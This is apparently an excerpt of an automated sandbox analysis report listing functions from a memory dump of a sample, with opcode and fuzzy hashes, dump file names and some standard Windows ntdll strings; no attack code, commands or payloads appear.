                                                              • Instruction Fuzzy Hash: 7990027570544842E140719C4418A460015D7D030AF95C051A0064694DD6258E59B761
                                                              Function 01392AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17d8d5ab2970280c16cf858884efe4b959a8ea02e9f7e336f07904a5ef21056c
                                                              • Instruction ID: e17992ca8a3c34bd884217003387bd5a6867b64d8d493f044df11efcf919e36c
                                                              • Opcode Fuzzy Hash: 17d8d5ab2970280c16cf858884efe4b959a8ea02e9f7e336f07904a5ef21056c
                                                              • Instruction Fuzzy Hash: EE9002E5701540929500B29C8418B0A4505D7E0206B95C056E1054560CC52589559235
                                                              Function 01392AF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96e943a0c3b544fdceaad8e43ff9d411931c616c2056673797a5ff0398cdcf61
                                                              • Instruction ID: e4b55b88863f7ab3ef9ebc2d431e087dc74b36d8b6732df40a074d97b40c3c88
                                                              • Opcode Fuzzy Hash: 96e943a0c3b544fdceaad8e43ff9d411931c616c2056673797a5ff0398cdcf61
                                                              • Instruction Fuzzy Hash: 17900269721400025145B59C061850B0445E7D63563D5C055F1416590CC62189695321
                                                              Function 01392AD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 175e89d953e55c1e393dac52914be804f9d3fa0e22cf4d10fa92c2b185cbae54
                                                              • Instruction ID: 889fd49eca3b873cb439e22732a3ec5e64950351c93b5a7749d4c28f1c6127d1
                                                              • Opcode Fuzzy Hash: 175e89d953e55c1e393dac52914be804f9d3fa0e22cf4d10fa92c2b185cbae54
                                                              • Instruction Fuzzy Hash: 5F90047D711400035105F5DC071C5070047D7D53573D5C071F1015550CD731CD755331
                                                              Function 01392D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33e766e9df34841cf6bc1469486453b4e361bf5934feb2d2d715b0d93f064c50
                                                              • Instruction ID: 3bcfe5c298e04485f57fd5ecde75e51cde4a8b84cdb82f4c5f74a4f49e9ab351
                                                              • Opcode Fuzzy Hash: 33e766e9df34841cf6bc1469486453b4e361bf5934feb2d2d715b0d93f064c50
                                                              • Instruction Fuzzy Hash: A090026570140003E140719C542C6064005E7E1306F95D051E0414554CD915895A5322
                                                              Function 01392D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5cf12438b823f956fe96b2323a7d2627d747addfb644c7909dd4a31df87ad8b
                                                              • Instruction ID: 4d517a52e65ce09ca2a1e8d9bbb5c995ee2d312e1a65bc90702dcdb31015d797
                                                              • Opcode Fuzzy Hash: c5cf12438b823f956fe96b2323a7d2627d747addfb644c7909dd4a31df87ad8b
                                                              • Instruction Fuzzy Hash: CD90026D71340002E180719C541C60A0005D7D1207FD5D455A0015558CC915896D5321
                                                              Function 01392D00 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a71eee9aa135b580ad0cd6b35d950ae13e8008b0e626e212d8eaabf490e48dc
                                                              • Instruction ID: 00d7bb50e0bd29b74387d006eaf27d2fe7647a25101e707d24da5d22013036fd
                                                              • Opcode Fuzzy Hash: 5a71eee9aa135b580ad0cd6b35d950ae13e8008b0e626e212d8eaabf490e48dc
                                                              • Instruction Fuzzy Hash: B590026570544442E100759C541CA060005D7D020AF95D051A1064595DC6358955A231
                                                              Function 01392DB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e42395254ff5e06ac1a0643e1ca9d0ecee36677234ae43fb2321cb5e27546e5
                                                              • Instruction ID: eca994b8e3190509e15cbba2affc40dfe564de9d33bcd716c41d94797e047145
                                                              • Opcode Fuzzy Hash: 8e42395254ff5e06ac1a0643e1ca9d0ecee36677234ae43fb2321cb5e27546e5
                                                              • Instruction Fuzzy Hash: 0090027574140402E141719C44186060009E7D0246FD5C052A0424554EC6558B5AAB61
                                                              Function 01392DD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a40d813a6ed4865c491683621215e6d7d52be0f434351f74e723159b194d0d2e
                                                              • Instruction ID: f6654d845c9738dc4ad5e6bda0590f3f0fce7891c9edc979525a14c3e5297c6f
                                                              • Opcode Fuzzy Hash: a40d813a6ed4865c491683621215e6d7d52be0f434351f74e723159b194d0d2e
                                                              • Instruction Fuzzy Hash: F090026574244152A545B19C44185074006E7E02467D5C052A1414950CC526995AD721
                                                              Function 01392C60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 594dca6a877b9a46ac1b0e469c01a99514fbab8dc75313f66a3398e6819ca7a0
                                                              • Instruction ID: 616768e27635898e81510b7f571fd4d0ed22c3f7b587c1fcfe24b7e35a691f54
                                                              • Opcode Fuzzy Hash: 594dca6a877b9a46ac1b0e469c01a99514fbab8dc75313f66a3398e6819ca7a0
                                                              • Instruction Fuzzy Hash: F890027570140842E100719C4418B460005D7E0306F95C056A0124654DC615C9557621
                                                              Function 01392CA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53d3b96935caa6574bbfe771102a10d45ad94f0b10890ab78c3d860a5c772a83
                                                              • Instruction ID: acf212e65f20ca05c946b0713bd22930c0a88c629d68c4061e180417cff59a71
                                                              • Opcode Fuzzy Hash: 53d3b96935caa6574bbfe771102a10d45ad94f0b10890ab78c3d860a5c772a83
                                                              • Instruction Fuzzy Hash: BC90027570140402E10075DC541C6460005D7E0306F95D051A5024555EC66589956231
                                                              Function 01392CF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d4ea31dbc528102e9cf90bbecabf6f0e1ed2146159d199ac249340f369ff9147
                                                              • Instruction ID: cf219d520f013b4bb78c3b9a9dd0a853f6fb87adea325321c60fa3a6ca50cf2b
                                                              • Opcode Fuzzy Hash: d4ea31dbc528102e9cf90bbecabf6f0e1ed2146159d199ac249340f369ff9147
                                                              • Instruction Fuzzy Hash: 8390027570140403E100719C551C7070005D7D0206F95D451A0424558DD65689556221
                                                              Function 01392CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46c3e480ef7dbdd59c9db585167485d337de5e321c0f8f74929e6868723f0864
                                                              • Instruction ID: 4e796b16f680c4d13ed60bafb4e1a60129a622bd2b80040dbcba8380e371ece0
                                                              • Opcode Fuzzy Hash: 46c3e480ef7dbdd59c9db585167485d337de5e321c0f8f74929e6868723f0864
                                                              • Instruction Fuzzy Hash: 17900265B0540402E140719C542C7060015D7D0206F95D051A0024554DC6598B5967A1
                                                              Function 01392F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34789080342c4a5340f9325a96b4197649e1ee687f8afab9fa3715af5737c24f
                                                              • Instruction ID: 9f27e88d4af6192a74adfd8a6b230bf1c90fe0d71b80f4aa9926eadb1ce2c54e
                                                              • Opcode Fuzzy Hash: 34789080342c4a5340f9325a96b4197649e1ee687f8afab9fa3715af5737c24f
                                                              • Instruction Fuzzy Hash: 129002A574140442E100719C4428B060005D7E1306F95C055E1064554DC619CD566226
                                                              Function 01392F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bda260aa1990cb2acacc364c6b0be86a7c319d0222deb5ef06f42cb1858cb17
                                                              • Instruction ID: 31a412f669db0d85fd197990ad8d2120bacf46cd6fcd4fc0e80a1895c390c6e1
                                                              • Opcode Fuzzy Hash: 6bda260aa1990cb2acacc364c6b0be86a7c319d0222deb5ef06f42cb1858cb17
                                                              • Instruction Fuzzy Hash: 499002A571140042E104719C44187060045D7E1206F95C052A2154554CC5298D655225
                                                              Function 01392FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7cbc78b7c9fb604ea70d48f7dba22aeea0d0ab243682907687c906677484756
                                                              • Instruction ID: 54d2ee8676f41c466ed1cea6bd126d83541e49cf764e5283b90eb6f83b6e5469
                                                              • Opcode Fuzzy Hash: c7cbc78b7c9fb604ea70d48f7dba22aeea0d0ab243682907687c906677484756
                                                              • Instruction Fuzzy Hash: 9E900265B0140042914071AC88589064005FBE1216795C161A0998550DC55989695765
                                                              Function 01392FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 535227446b3fc16a83bc4b238d3aa20611b3bfe00acdf7d720253d457c24ff14
                                                              • Instruction ID: 3d174c0e60e1733cb188fb9f5cb3bfe6619e0448dd18369027692d9649af464f
                                                              • Opcode Fuzzy Hash: 535227446b3fc16a83bc4b238d3aa20611b3bfe00acdf7d720253d457c24ff14
                                                              • Instruction Fuzzy Hash: BB90027570180402E100719C481C7470005D7D0307F95C051A5164555EC665C9956631
                                                              Function 01392F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 117b0691897969359246c8e9d7961dc34223b045d3f38c841a61b4ec875fde15
                                                              • Instruction ID: e31db196d671ee527d71b97b8d553466959cd3cf3867f86f9f3a765c9b3251cb
                                                              • Opcode Fuzzy Hash: 117b0691897969359246c8e9d7961dc34223b045d3f38c841a61b4ec875fde15
                                                              • Instruction Fuzzy Hash: 3C90027570180402E100719C482870B0005D7D0307F95C051A1164555DC62589556671
                                                              Function 01392FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37323e035c8540c45f8c80d57a1532f4d4fa0f734d48bca24b5c620510c12784
                                                              • Instruction ID: d06669a847053416653201f7e752f8fe92601e1a3c42534a3956f1afe6b05b4b
                                                              • Opcode Fuzzy Hash: 37323e035c8540c45f8c80d57a1532f4d4fa0f734d48bca24b5c620510c12784
                                                              • Instruction Fuzzy Hash: 75900265711C0042E20075AC4C28B070005D7D0307F95C155A0154554CC91589655621
                                                              Function 01392E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31f22d579c4a7e07ba033acacf1f059f4a9bb9991cfddd3833420403108eefe3
                                                              • Instruction ID: 29915110bda7f434b786002cd656e237a76372c06051634f16ffdd3d4fd7e4d6
                                                              • Opcode Fuzzy Hash: 31f22d579c4a7e07ba033acacf1f059f4a9bb9991cfddd3833420403108eefe3
                                                              • Instruction Fuzzy Hash: 7F90026570140402E102719C44286060009D7D134AFD5C052E1424555DC6258A57A232
                                                              Function 01392EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb562d3b88690908e73c3b54bc678b7c5c00ac18d2f667dddfcf0b46137ba140
                                                              • Instruction ID: 21f2df315301fa64598472dd4384ac219f2aca6d730f82c64b98f17888c8ec1d
                                                              • Opcode Fuzzy Hash: cb562d3b88690908e73c3b54bc678b7c5c00ac18d2f667dddfcf0b46137ba140
                                                              • Instruction Fuzzy Hash: BC9002B570140402E140719C44187460005D7D0306F95C051A5064554EC6598ED96765
                                                              Function 01392E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09bf5c79cac5ba81a50b442baf773361e4e7c423f16d70e940354b2cbf02b52e
                                                              • Instruction ID: 35a817bb7aadc9b6f9c6a90f91aacee160f109e0192d18b8a766bc017b650fca
                                                              • Opcode Fuzzy Hash: 09bf5c79cac5ba81a50b442baf773361e4e7c423f16d70e940354b2cbf02b52e
                                                              • Instruction Fuzzy Hash: AD900265B0140502E101719C4418616000AD7D0246FD5C062A1024555ECA258A96A231
                                                              Function 01392EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ade756057c7e231d07e8ae7de395f6876d1b016368866b77a0b9c4221fb988c
                                                              • Instruction ID: 2e381ec8fdb1bae624cac0f12fd9483f2da637a1e7e07ddfd6d50e024bc79f91
                                                              • Opcode Fuzzy Hash: 7ade756057c7e231d07e8ae7de395f6876d1b016368866b77a0b9c4221fb988c
                                                              • Instruction Fuzzy Hash: D49002A570180403E140759C48186070005D7D0307F95C051A2064555ECA298D556235
                                                              Function 01393010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94121b9987e693643ed3d28b2e457b4869ce5e0f93bc4abd2ff14be7f318355e
                                                              • Instruction ID: 374203d49fd6d0efd8d867955c442230e72caa28601ef512d4636e312f9bdade
                                                              • Opcode Fuzzy Hash: 94121b9987e693643ed3d28b2e457b4869ce5e0f93bc4abd2ff14be7f318355e
                                                              • Instruction Fuzzy Hash: EB90026570184442E140729C4818B0F4105D7E1207FD5C059A4156554CC91589595721
                                                              Function 01393090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34e863650794e7e671e925c7964a30a6f6a456802e9d230c27c9fa430b0d26b5
                                                              • Instruction ID: e413c68b0a4ae352b96fbb47a129b465e8b5683a6958b30f504ae60e83f7d785
                                                              • Opcode Fuzzy Hash: 34e863650794e7e671e925c7964a30a6f6a456802e9d230c27c9fa430b0d26b5
                                                              • Instruction Fuzzy Hash: BF90026574140802E140719C84287070006D7D0606F95C051A0024554DC6168A6967B1
                                                              Function 013939B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 654088180512ce92cc4e4de417b7046f35d10b537a0892d3dfbe57a9372a968f
                                                              • Instruction ID: 3c214509fe3ec6ae80b68cdf4292e1992810251f55680b1ae1874091dbe7e6c3
                                                              • Opcode Fuzzy Hash: 654088180512ce92cc4e4de417b7046f35d10b537a0892d3dfbe57a9372a968f
                                                              • Instruction Fuzzy Hash: 1C90026574545102E150719C44186164005F7E0206F95C061A0814594DC55589596321
                                                              Function 01393D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4a12f7a6609933d87d2d5d94d917864327b3df7284f985f37479ae9456c413e
                                                              • Instruction ID: ab650f89d223decfc0d14fabdb4605baf40e3eda08399c8c25e1e8cfcefacccf
                                                              • Opcode Fuzzy Hash: c4a12f7a6609933d87d2d5d94d917864327b3df7284f985f37479ae9456c413e
                                                              • Instruction Fuzzy Hash: 0390027570240142E540729C5818A4E4105D7E1307BD5D455A0015554CC91489655321
                                                              Function 01393D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77701b5151af8b9810045729c20cd1c6dd34ac62512fde447298cc1083283ef3
                                                              • Instruction ID: 8c5045ae56ae213ab015e4c21e0c4a5685e15d89a3e9deb3fa9b5b5ffbc0f094
                                                              • Opcode Fuzzy Hash: 77701b5151af8b9810045729c20cd1c6dd34ac62512fde447298cc1083283ef3
                                                              • Instruction Fuzzy Hash: 3490027970140402E510719C58186460046D7D0306F95D451A0424558DC65489A5A221
                                                              Function 01392C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: a6d066aa7d5b28ad2df25e9cec57869bd68c93a4baa7b894d3225a3368ad5658
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 01392890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
                                                              • Instruction ID: c164b3e90e664baf9efa8afa7e33de3550cf97230e246d936597df8aac0599bb
                                                              • Opcode Fuzzy Hash: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
                                                              • Instruction Fuzzy Hash: 6451F7B6A0451ABFCF11DB9C888097FFBB8BB18248B50C129F4A5D7641E334EE1087E0
                                                              Function 01402410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                                                              • Instruction ID: 07870d4b69bb9f2da438649abf5535cad648d524ddbde6ccdb985888fa22b4ac
                                                              • Opcode Fuzzy Hash: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                                                              • Instruction Fuzzy Hash: 4951F471A00656ABDB22DE5EC994C7FBBF8EB44204B44847BE4D6D37D1E6B4EA008760
                                                              Function 01387630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013C4742
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013C46FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013C4655
                                                              • Execute=1, xrefs: 013C4713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013C4725
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 013C4787
                                                              • ExecuteOptions, xrefs: 013C46A0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                                                              • Instruction ID: 9835da84f7a9f607c2d03c9e8ac3943d1c4a16c4ffbbfedaaf52e294a5a373a8
                                                              • Opcode Fuzzy Hash: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                                                              • Instruction Fuzzy Hash: 125127356003096AEF20BBA8DC95FBA77A9AF5471CF1400A9E605A7290EB709E45CF50
